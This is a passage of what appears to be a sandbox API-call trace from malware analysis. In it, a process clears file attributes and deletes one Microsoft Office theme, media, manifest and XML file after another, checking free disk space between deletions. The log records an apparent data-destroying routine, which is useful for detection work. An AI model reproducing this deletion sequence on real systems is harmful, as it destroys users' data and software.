lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml", dwFileAttributes=0x80) returned 1 [0069.660] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\median.xml")) returned 1 [0069.662] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml", dwFileAttributes=0x80) returned 1 [0069.666] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\metro.xml")) returned 1 [0069.669] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml", dwFileAttributes=0x80) returned 1 [0069.674] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\module.xml")) returned 1 [0069.676] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml", dwFileAttributes=0x80) returned 1 [0069.680] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\newsprint.xml")) returned 1 [0069.683] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml", dwFileAttributes=0x80) returned 1 [0069.687] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office 2.xml")) returned 1 [0069.691] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml", dwFileAttributes=0x80) returned 1 [0069.698] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic 2.xml")) returned 1 [0069.700] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml", dwFileAttributes=0x80) returned 1 [0069.715] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic.xml")) returned 1 [0069.718] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml", dwFileAttributes=0x80) returned 1 [0069.722] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\opulent.xml")) returned 1 [0069.724] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml", dwFileAttributes=0x80) returned 1 [0069.729] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\oriel.xml")) returned 1 [0069.732] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.736] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml", dwFileAttributes=0x80) returned 1 [0069.736] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\origin.xml")) returned 1 [0069.739] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.743] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml", dwFileAttributes=0x80) returned 1 [0069.743] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\paper.xml")) returned 1 [0069.746] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.749] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml", dwFileAttributes=0x80) returned 1 [0069.750] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\perspective.xml")) returned 1 [0069.753] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml", dwFileAttributes=0x80) returned 1 [0069.758] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\pushpin.xml")) returned 1 [0069.761] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml", dwFileAttributes=0x80) returned 1 [0069.765] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\slipstream.xml")) returned 1 [0069.769] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml", dwFileAttributes=0x80) returned 1 [0069.773] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\solstice.xml")) returned 1 [0069.775] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.780] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml", dwFileAttributes=0x80) returned 1 [0069.780] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\technic.xml")) returned 1 [0069.783] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml", dwFileAttributes=0x80) returned 1 [0069.787] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\thatch.xml")) returned 1 [0069.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml", dwFileAttributes=0x80) returned 1 [0069.794] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\trek.xml")) returned 1 [0069.797] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml", dwFileAttributes=0x80) returned 1 [0069.801] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\urban.xml")) returned 1 [0069.804] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.808] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml", dwFileAttributes=0x80) returned 1 [0069.808] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\verve.xml")) returned 1 [0069.811] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml", dwFileAttributes=0x80) returned 1 [0069.818] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\waveform.xml")) returned 1 [0069.820] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0069.820] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0069.820] CoTaskMemFree (pv=0x506980) [0069.821] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0069.821] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0069.821] CoTaskMemFree (pv=0x506980) [0069.826] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW", dwFileAttributes=0x80) returned 1 [0069.876] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw")) returned 1 [0069.881] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\ELPHRG01.WAV", dwFileAttributes=0x80) returned 1 [0069.887] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\ELPHRG01.WAV" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\elphrg01.wav")) returned 1 [0069.892] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0214098.WAV", dwFileAttributes=0x80) returned 1 [0069.900] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0214098.WAV" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0214098.wav")) returned 1 [0069.904] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0284916.JPG", dwFileAttributes=0x80) returned 1 [0069.912] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0284916.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0284916.jpg")) returned 1 [0069.917] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302827.JPG", dwFileAttributes=0x80) returned 1 [0069.924] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302827.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0302827.jpg")) returned 1 [0069.926] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302953.JPG", dwFileAttributes=0x80) returned 1 [0069.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302953.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0302953.jpg")) returned 1 [0069.934] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0069.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0315447.JPG", dwFileAttributes=0x80) returned 1 [0069.940] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0315447.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0315447.jpg")) returned 1 [0069.944] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0069.944] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0069.944] CoTaskMemFree (pv=0x506980) [0069.944] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0069.944] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0069.945] CoTaskMemFree (pv=0x506980) [0069.947] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0070.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW", dwFileAttributes=0x80) returned 1 [0070.001] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw")) returned 1 [0070.007] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0070.007] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0070.007] CoTaskMemFree (pv=0x506980) [0070.007] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0070.007] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0070.007] CoTaskMemFree (pv=0x506980) [0070.015] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0070.015] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0070.015] CoTaskMemFree (pv=0x506980) [0070.029] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0070.029] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0070.029] CoTaskMemFree (pv=0x506980) [0070.038] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0070.038] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0070.038] CoTaskMemFree (pv=0x506980) [0070.053] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest", dwFileAttributes=0x80) returned 1 [0070.059] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\excel.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\excel.exe.manifest")) returned 1 [0070.062] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRM.XML", dwFileAttributes=0x80) returned 1 [0070.071] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\exlirm.xml")) returned 1 [0070.075] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.084] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRMV.XML", dwFileAttributes=0x80) returned 1 [0070.084] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EXLIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\exlirmv.xml")) returned 1 [0070.088] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.092] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest", dwFileAttributes=0x80) returned 1 [0070.093] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.manifest")) returned 1 [0070.097] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRM.XML", dwFileAttributes=0x80) returned 1 [0070.129] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\ipirm.xml")) returned 1 [0070.133] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRMV.XML", dwFileAttributes=0x80) returned 1 [0070.147] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IPIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\ipirmv.xml")) returned 1 [0070.151] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.xml", dwFileAttributes=0x80) returned 1 [0070.196] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.businessdata.xml")) returned 1 [0070.201] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0070.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.Runtime.xml", dwFileAttributes=0x80) returned 1 [0070.206] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft 